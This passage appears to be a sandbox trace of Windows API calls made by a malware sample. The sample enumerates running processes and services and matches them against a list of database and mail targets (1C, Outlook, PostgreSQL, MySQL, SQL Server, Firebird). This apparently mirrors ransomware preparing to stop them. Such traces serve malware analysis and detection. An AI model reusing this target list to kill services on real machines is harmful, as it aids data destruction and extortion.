cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.390] lstrlenW (lpString="svchost.exe") returned 11 [0272.390] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.390] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.390] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.391] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0272.391] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0272.391] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0272.391] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0272.391] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.391] lstrlenW (lpString="svchost.exe") returned 11 [0272.391] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.391] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.391] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.391] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0272.391] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0272.391] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0272.391] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0272.391] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.391] lstrlenW (lpString="svchost.exe") returned 11 [0272.391] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.391] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.392] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.392] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0272.392] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0272.392] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0272.392] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0272.392] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.392] lstrlenW (lpString="svchost.exe") returned 11 [0272.392] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.392] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.392] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.392] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0272.392] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0272.392] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0272.392] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0272.392] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.392] lstrlenW (lpString="svchost.exe") returned 11 [0272.392] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.392] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.393] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.393] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0272.393] lstrlenW (lpString="audiodg.exe") returned 11 [0272.393] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.393] lstrlenW (lpString="svchost.exe") returned 11 [0272.393] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0272.394] lstrlenW (lpString="userinit.exe") returned 12 [0272.394] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x378, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0272.394] lstrlenW (lpString="explorer.exe") returned 12 [0272.394] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x420, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0272.394] lstrlenW (lpString="dwm.exe") returned 7 [0272.394] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.395] lstrlenW (lpString="svchost.exe") returned 11 [0272.395] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0272.395] lstrlenW (lpString="agent1c.exe") returned 11 [0272.395] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0272.395] lstrlenW (lpString="spoolsv.exe") returned 11 [0272.396] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0272.396] lstrlenW (lpString="reader_sl.exe") returned 13 [0272.396] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0272.396] lstrlenW (lpString="dllhost.exe") returned 11 [0272.396] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0272.397] lstrlenW (lpString="taskhost.exe") returned 12 [0272.397] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.397] lstrlenW (lpString="svchost.exe") returned 11 [0272.397] Process32NextW (in: hSnapshot=0x3a8, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0272.397] CloseHandle (hObject=0x3a8) returned 1 [0272.398] Sleep (dwMilliseconds=0x1f4) [0272.973] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x3594c80 [0273.043] EnumServicesStatusExW (in: hSCManager=0x3594c80, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 0 [0273.044] GetLastError () returned 0xea [0273.044] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc9a) returned 0x4262fb8 [0273.044] EnumServicesStatusExW (in: hSCManager=0x3594c80, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4262fb8, cbBufSize=0xc9a, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4262fb8, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 1 [0273.044] CloseServiceHandle (hSCObject=0x3594c80) returned 1 [0273.044] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0273.044] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0273.044] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0273.044] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0273.044] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0273.044] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0273.044] lstrlenW (lpString="AudioSrv") returned 8 [0273.044] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0273.044] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0273.044] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0273.045] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0273.045] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0273.045] lstrlenW (lpString="BFE") returned 3 [0273.045] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0273.045] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0273.045] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0273.045] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0273.045] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0273.045] lstrlenW (lpString="CryptSvc") returned 8 [0273.045] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0273.045] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0273.045] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0273.045] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0273.045] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0273.045] lstrlenW (lpString="CscService") returned 10 [0273.045] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0273.045] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0273.045] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0273.045] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0273.045] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0273.045] lstrlenW (lpString="DcomLaunch") returned 10 [0273.045] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0273.045] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0273.045] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0273.045] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0273.045] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0273.045] lstrlenW (lpString="Dhcp") returned 4 [0273.045] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0273.045] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0273.045] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0273.045] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0273.046] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0273.046] lstrlenW (lpString="Dnscache") returned 8 [0273.046] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0273.046] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0273.046] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0273.046] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0273.046] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0273.046] lstrlenW (lpString="DPS") returned 3 [0273.046] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0273.046] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0273.046] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0273.046] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0273.046] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0273.046] lstrlenW (lpString="eventlog") returned 8 [0273.046] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0273.046] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0273.046] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0273.046] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0273.046] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0273.046] lstrlenW (lpString="EventSystem") returned 11 [0273.046] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0273.046] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0273.046] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0273.046] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0273.046] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0273.046] lstrlenW (lpString="gpsvc") returned 5 [0273.046] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0273.046] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0273.046] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0273.046] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0273.046] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0273.046] lstrlenW (lpString="LanmanWorkstation") returned 17 [0273.046] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0273.046] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0273.047] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0273.047] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0273.047] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0273.047] lstrlenW (lpString="lmhosts") returned 7 [0273.047] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0273.047] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0273.047] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0273.047] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0273.047] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0273.047] lstrlenW (lpString="MMCSS") returned 5 [0273.047] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0273.047] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0273.047] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0273.047] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0273.047] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0273.047] lstrlenW (lpString="MpsSvc") returned 6 [0273.047] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0273.047] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0273.047] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0273.047] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0273.047] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0273.047] lstrlenW (lpString="NlaSvc") returned 6 [0273.047] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0273.047] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0273.047] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0273.047] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0273.047] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0273.047] lstrlenW (lpString="nsi") returned 3 [0273.047] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0273.047] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0273.047] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0273.047] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0273.047] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0273.047] lstrlenW (lpString="PcaSvc") returned 6 [0273.048] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0273.048] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0273.048] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0273.048] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0273.048] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0273.048] lstrlenW (lpString="PlugPlay") returned 8 [0273.048] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0273.048] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0273.048] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0273.048] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0273.048] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0273.048] lstrlenW (lpString="Power") returned 5 [0273.048] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0273.048] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0273.048] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0273.048] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0273.048] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0273.048] lstrlenW (lpString="ProfSvc") returned 7 [0273.048] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0273.048] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0273.048] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0273.048] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0273.048] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0273.048] lstrlenW (lpString="RpcEptMapper") returned 12 [0273.048] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0273.048] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0273.048] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0273.048] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0273.048] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0273.048] lstrlenW (lpString="RpcSs") returned 5 [0273.048] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0273.048] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0273.048] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0273.048] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0273.048] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0273.049] lstrlenW (lpString="SamSs") returned 5 [0273.049] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0273.049] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0273.049] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0273.049] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0273.049] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0273.049] lstrlenW (lpString="Schedule") returned 8 [0273.049] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0273.049] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0273.049] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0273.049] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0273.049] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0273.049] lstrlenW (lpString="SENS") returned 4 [0273.049] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0273.049] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0273.049] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0273.049] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0273.049] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0273.049] lstrlenW (lpString="ShellHWDetection") returned 16 [0273.049] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0273.049] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0273.049] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0273.049] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0273.049] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0273.049] lstrlenW (lpString="Spooler") returned 7 [0273.049] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0273.049] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0273.049] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0273.049] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0273.049] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0273.049] lstrlenW (lpString="Themes") returned 6 [0273.049] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0273.049] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0273.049] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0273.049] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0273.049] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0273.049] lstrlenW (lpString="UxSms") returned 5 [0273.050] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0273.050] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0273.050] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0273.050] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0273.050] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0273.050] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4262fb8 | out: hHeap=0x4a0000) returned 1 [0273.050] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x37c [0273.051] Process32FirstW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.051] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0273.052] lstrlenW (lpString="System") returned 6 [0273.052] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0273.052] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0273.052] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0273.052] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0273.052] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0273.052] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0273.052] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0273.052] Process32NextW (in: hSnapshot=0x37c, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0273.052] lstrlenW (lpString="smss.exe") returned 8 [0273.052] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0273.052] lstrcmpiW (lpString1="1cv77.exe", 